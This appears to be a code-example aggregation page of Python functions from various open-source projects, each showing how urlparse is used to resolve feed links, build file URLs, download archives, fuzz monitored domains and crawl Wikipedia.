项目:PyDoc    作者:shaun-h    | 项目源码 | 文件源码
def __getDownloadLink(self, link):
    """Resolve a feed name into a ``{'url', 'version'}`` dict.

    The feed XML is downloaded and its first ``version`` element read.  For
    the SproutCore feed the first ``url`` entry is returned directly.  For
    other feeds the first entry is rewritten to point at the local server
    when one is configured; otherwise the first entry containing the
    download server's URL is returned.  Returns None when nothing matches.
    """
    if link == 'SproutCore.xml':
        data = requests.get('http://docs.sproutcore.com/feeds/' + link).text
        feed = xml.etree.ElementTree.fromstring(data)
        version = feed.findall('version')[0].text
        entries = feed.findall('url')
        if entries:
            return {'url': entries[0].text, 'version': version}

    server = self.serverManager.getDownloadServer(self.localServer)
    data = requests.get(server.url + link).text
    feed = xml.etree.ElementTree.fromstring(data)
    version = feed.findall('version')[0].text
    for entry in feed.findall('url'):
        if not self.localServer == None:
            # Keep only the file name and serve it from the local server.
            remote_path = urlparse(entry.text).path
            filename, file_ext = splitext(basename(remote_path))
            url = self.localServer
            if url[-1] != '/':
                url += '/'
            return {'url': url + filename + file_ext, 'version': version}
        if server.url in entry.text:
            return {'url': entry.text, 'version': version}
项目:do-portal    作者:certeu    | 项目源码 | 文件源码
def fuzz_one(fqdn):
    """Generate fuzzed variants of a stored FQDN and queue each for checks.

    :param fqdn: value used to look up the ``Fqdn`` record
    """
    original = Fqdn.query.filter_by(fqdn=fqdn).first()

    target = original.fqdn
    # no scheme, assuming HTTP
    if '://' not in target:
        target = 'http://' + target
    url = urlparse(target)

    fuzzed = DomainFuzz(url.netloc)
    fuzzed.generate()

    checks = dict(banners=True, geoip=True, whois=True, ssdeep=True,
                  mxcheck=False)
    for domain in fuzzed.domains:
        augment.delay(domain, url, original.id, checks)
项目:radar    作者:amoose136    | 项目源码 | 文件源码
def _isurl(self, path):
    """Test if path is a net location.  Tests the scheme and netloc."""

    # We do this here to reduce the 'import numpy' initial import time.
    try:
        from urllib.parse import urlparse
    except ImportError:
        # Python 2 keeps urlparse in its own top-level module.
        from urlparse import urlparse

    # BUG : URLs require a scheme string ('http://') to be used.
    #       www.google.com will fail.
    #       Should we prepend the scheme for those that don't have it and
    #       test that also?  Similar to the way we append .gz and test for
    #       for compressed versions of files.

    parsed = urlparse(path)
    return bool(parsed.scheme and parsed.netloc)
项目:ZeroExploit    作者:5alt    | 项目源码 | 文件源码
def get_type(key, value):
    """Classify a parameter value by its textual shape.

    A list is reported as ``'array'``.  Otherwise the first element of
    *value* is examined and classified, in this order, as ``'int'``,
    ``'float'``, ``'url'``, ``'json'`` (a JSON list or object) or ``'str'``.

    :param key: not used by the classification
    :param value: a list, or an indexable whose first element is the string
        to classify
    """
    if type(value) == type([]): return 'array'
    value = value[0]
    if value.isdigit(): return 'int'
    try:
        float(value)
        return 'float'
    except Exception:
        # Not a float.  ``Exception`` rather than a bare ``except`` so that
        # KeyboardInterrupt and SystemExit still propagate.
        pass
    # url check
    u = urlparse.urlparse(value)
    if u.scheme and u.netloc:
        return 'url'
    try:
        j = json.loads(value)
        if type(j) == type([]) or type(j) == type({}):
            return 'json'
    except Exception:
        # Not valid JSON.
        pass
    return 'str'
项目:weibopy    作者:nooperpudd    | 项目源码 | 文件源码
def test_authorize_url(self):
    """
    The authorize URL targets api.weibo.com and carries the client
    parameters.

    :return:
    """
    expected_params = {
        'client_id': self.client_id,
        'redirect_uri': self.redirect_url,
        "forcelogin": "false"
    }

    authorize = parse.urlparse(self.oauth2_client.authorize_url)
    actual_params = dict(parse.parse_qsl(authorize.query))

    self.assertEqual(authorize.hostname, "api.weibo.com")
    self.assertEqual(authorize.path, "/oauth2/authorize")
    self.assertDictEqual(actual_params, expected_params)
项目:peony-twitter    作者:odrling    | 项目源码 | 文件源码
async def send_tweet_with_media():
    """Prompt for a status and a media file, upload the file and tweet it.

    Declared ``async`` because the body uses ``async with`` and ``await``,
    which are a syntax error inside a plain ``def``.
    """
    # read the tweet's status
    status = input("status: ")

    # Ask until something is entered.  Existence is not checked here
    # because the raw input may still be quoted or a file:// URL.
    path = ""
    while not path:
        path = input('file to upload:\n')

    # read the most common input formats
    path = urlparse(path).path.strip(" \"'")

    async with aiofiles.open(path, 'rb') as media:
        # optimize pictures if PIL is available
        if PIL:
            media = await process_media(media, path)

        uploaded = await client.upload_media(media,
                                             chunk_size=2**18,
                                             chunked=True)
        media_id = uploaded.media_id
        await client.api.statuses.update.post(status=status,
                                              media_ids=media_id)
项目:gprime    作者:GenealogyCollective    | 项目源码 | 文件源码
def parse_path(self):
        """
        Split ``self.path`` into URL components using ``urlparse``.

        The result is a 6-item tuple-like object:

        ======== ===   =================================
        Property Pos   Meaning
        ======== ===   =================================
        scheme   0     URL scheme specifier
        netloc   1     Network location part
        path     2     Hierarchical path
        params   3     Parameters for last path element
        query    4     Query component
        fragment 5     Fragment identifier
        ======== ===   =================================
        """
        components = urlparse(self.path)
        return components
项目:flactory    作者:mehdy    | 项目源码 | 文件源码
def check_template(ctx, _, value):
    """
        Resolve a template reference to its directory under
        ``$HOME/.flactory/templates``.

        A reference without a network location is assumed to live on
        ``github.com``; a trailing ``.git`` is ignored.
    :param ctx: app context, used to abort or fail
    :param _: unused positional argument
    :param value: the parameter value (template URL or ``user/repo`` path)
    :return: path of the existing template directory
    """
    if not value:
        # TODO: get list and show
        raise ctx.abort()

    url = urlparse(value)
    if not url.netloc:
        url = url._replace(netloc='github.com')
    if url.path.endswith('.git'):
        url = url._replace(path=url.path[:-4])
    # A full URL yields a path starting with "/"; os.path.join would then
    # throw away every preceding component, so make it relative first.
    rel_path = url.path.lstrip('/')
    path = os.path.join(os.environ['HOME'],
                        '.flactory/templates',
                        url.netloc, rel_path)
    if os.path.isdir(path):
        return path
    # TODO: if not exist pull it automatically
    # The ".git" suffix is already gone here, so show the path unsliced.
    repr_name = click.style("[{}] {}".format(url.netloc, rel_path),
                            bold=True)
    raise ctx.fail(repr_name + " doesn't exist.")
项目:aquests    作者:hansroh    | 项目源码 | 文件源码
def _getresponse(self, resp):
        """Wrap *resp*, first following the 202 status-polling flow.

        For any status other than 202 the response is wrapped in
        ``Response`` and returned directly.

        For 202 the ``content-location`` header names a status resource.
        It is fetched, then re-fetched up to ``MAX_RETRIES`` times, five
        seconds apart, until it answers 303. The path of its ``location``
        header is then fetched and returned.

        Raises:
            Exception: if ``content-location`` is missing, if no 303 is seen
                within the retry budget, or if the 303 has no ``location``.
        """
        if resp.status_code != 202:
            return Response (self, resp)

        status_url = resp.getheader('content-location')
        if not status_url:
            raise Exception('Empty content-location from server')

        status_uri = urlparse(status_url).path
        MAX_RETRIES = 3
        retries = 0
        resource = Resource(uri=status_uri, api=self._api, logger = self._logger).get()
        resp_status = resource.response.status_code

        while resp_status != 303 and retries < MAX_RETRIES:
            retries += 1
            # Wait before polling again, then refresh the status so the
            # loop condition can actually observe a change.
            time.sleep(5)
            resource = Resource(uri=status_uri, api=self._api, logger = self._logger).get()
            resp_status = resource.response.status_code

        if resp_status != 303:
            raise Exception('Max retries limit reached without success')

        # NOTE(review): assumes resource.response exposes getheader() like
        # the `resp` argument does -- confirm against Resource.
        location = resource.response.getheader('location')
        if not location:
            raise Exception('Empty location from server')
        return Resource(uri=urlparse(location).path, api=self._api, logger = self._logger).get()
项目:charm-plumgrid-gateway    作者:openstack    | 项目源码 | 文件源码
def file_to_url(self, file_rel_path):
        """Return a ``file`` URL for the absolute form of *file_rel_path*."""
        absolute = os.path.abspath(file_rel_path)
        # Parsing with a default scheme lets geturl() emit the prefix.
        parsed = urlparse.urlparse(absolute, scheme='file')
        return parsed.geturl()
项目:charm-plumgrid-gateway    作者:openstack    | 项目源码 | 文件源码
def download(self, source, dest):
        """
        Download an archive file.

        Credentials embedded in an http(s) URL (``user:pass@host``) are
        removed from the URL and installed as a global basic-auth opener
        before the request is made.

        :param str source: URL pointing to an archive file.
        :param str dest: Local path location to download archive file to.
        :raises: anything raised while opening, reading or writing; a
            partially written ``dest`` is removed first.
        """
        # propagate all exceptions
        # URLError, OSError, etc
        proto, netloc, path, params, query, fragment = urlparse(source)
        if proto in ('http', 'https'):
            auth, barehost = splituser(netloc)
            if auth is not None:
                source = urlunparse((proto, barehost, path, params, query, fragment))
                username, password = splitpasswd(auth)
                passman = HTTPPasswordMgrWithDefaultRealm()
                # Realm is set to None in add_password to force the username and password
                # to be used whatever the realm
                passman.add_password(None, source, username, password)
                authhandler = HTTPBasicAuthHandler(passman)
                opener = build_opener(authhandler)
                install_opener(opener)
        response = urlopen(source)
        try:
            with open(dest, 'wb') as dest_file:
                dest_file.write(response.read())
        except Exception:
            if os.path.isfile(dest):
                os.unlink(dest)
            # Bare raise keeps the original traceback intact.
            raise
        finally:
            # Always release the connection / file handle behind the response.
            response.close()

    # Mandatory file validation via Sha1 or MD5 hashing.
项目:charm-plumgrid-gateway    作者:openstack    | 项目源码 | 文件源码
def parse_url(self, url):
        """Return the ``urlparse`` breakdown of *url*."""
        parsed = urlparse(url)
        return parsed
项目:wikipedia-crawler    作者:AndreiRegiani    | 项目源码 | 文件源码
def main(initial_url, articles_limit, interval, output_file):
    """Run the single-threaded crawl loop, then exit the process.

    Prints a time estimate, loads any saved session, queues the path part
    of ``initial_url`` and scrapes queued URLs one by one, sleeping
    ``interval`` seconds before each, until ``articles_limit`` is reached or
    the queue is empty. CTRL+C pauses the loop until ENTER is pressed.
    """
    estimated_minutes = interval * articles_limit / 60
    print("This session will take {:.1f} minute(s) to download {} article(s):".format(estimated_minutes, articles_limit))
    print("\t(Press CTRL+C to pause)\n")

    session_file = "session_" + output_file
    load_urls(session_file)  # restore the queue of an earlier session, if any

    parsed_start = urlparse(initial_url)
    base_url = '{uri.scheme}://{uri.netloc}'.format(uri=parsed_start)
    # Only the part after scheme://host is queued.
    pending_urls.append(initial_url[len(base_url):])

    counter = 0
    while pending_urls:
        try:
            counter += 1
            if counter > articles_limit:
                break

            try:
                next_url = pending_urls.pop(0)
            except IndexError:
                break

            time.sleep(interval)
            label = next_url.replace('/wiki/', '')[:35]
            print("{:<7} {}".format(counter, label))
            scrap(base_url, next_url, output_file, session_file)
        except KeyboardInterrupt:
            input("\n> PAUSED. Press [ENTER] to continue...\n")
            # The interrupted iteration does not count towards the limit.
            counter -= 1

    print("Finished!")
    sys.exit(0)
项目:kas    作者:siemens    | 项目源码 | 文件源码
def __getattr__(self, item):
        """Compute the derived attributes ``layers`` and ``qualified_name``.

        ``layers`` is ``[self.path]`` when ``self._layers`` is empty,
        otherwise ``self.path`` joined with each layer by ``/``.
        ``qualified_name`` is the netloc and path of ``self.url`` with every
        ``@``, ``:``, ``/`` and ``*`` replaced by ``.``.

        Raises:
            AttributeError: for any other name, so that ``hasattr`` and
                ``getattr`` with a default behave normally instead of
                silently receiving ``None``.
        """
        if item == 'layers':
            if not self._layers:
                return [self.path]
            return [self.path + '/' + layer for layer in self._layers]
        elif item == 'qualified_name':
            url = urlparse(self.url)
            return ('{url.netloc}{url.path}'
                    .format(url=url)
                    .replace('@', '.')
                    .replace(':', '.')
                    .replace('/', '.')
                    .replace('*', '.'))
        # Default behaviour: unknown attributes do not exist.
        raise AttributeError(item)
项目:charm-swift-proxy    作者:openstack    | 项目源码 | 文件源码
def file_to_url(self, file_rel_path):
        """Build a ``file`` URL from the absolute form of *file_rel_path*."""
        location = os.path.abspath(file_rel_path)
        # The default scheme only applies because a plain path has none.
        url_parts = urlparse.urlparse(location, scheme='file')
        return url_parts.geturl()
项目:charm-swift-proxy    作者:openstack    | 项目源码 | 文件源码
def download(self, source, dest):
        """
        Download an archive file.

        Credentials embedded in an http(s) URL (``user:pass@host``) are
        removed from the URL and installed as a global basic-auth opener
        before the request is made.

        :param str source: URL pointing to an archive file.
        :param str dest: Local path location to download archive file to.
        :raises: anything raised while opening, reading or writing; a
            partially written ``dest`` is removed first.
        """
        # propagate all exceptions
        # URLError, OSError, etc
        proto, netloc, path, params, query, fragment = urlparse(source)
        if proto in ('http', 'https'):
            auth, barehost = splituser(netloc)
            if auth is not None:
                source = urlunparse((proto, barehost, path, params, query, fragment))
                username, password = splitpasswd(auth)
                passman = HTTPPasswordMgrWithDefaultRealm()
                # Realm is set to None in add_password to force the username and password
                # to be used whatever the realm
                passman.add_password(None, source, username, password)
                authhandler = HTTPBasicAuthHandler(passman)
                opener = build_opener(authhandler)
                install_opener(opener)
        response = urlopen(source)
        try:
            with open(dest, 'wb') as dest_file:
                dest_file.write(response.read())
        except Exception:
            if os.path.isfile(dest):
                os.unlink(dest)
            # Bare raise keeps the original traceback intact.
            raise
        finally:
            # Always release the connection / file handle behind the response.
            response.close()

    # Mandatory file validation via Sha1 or MD5 hashing.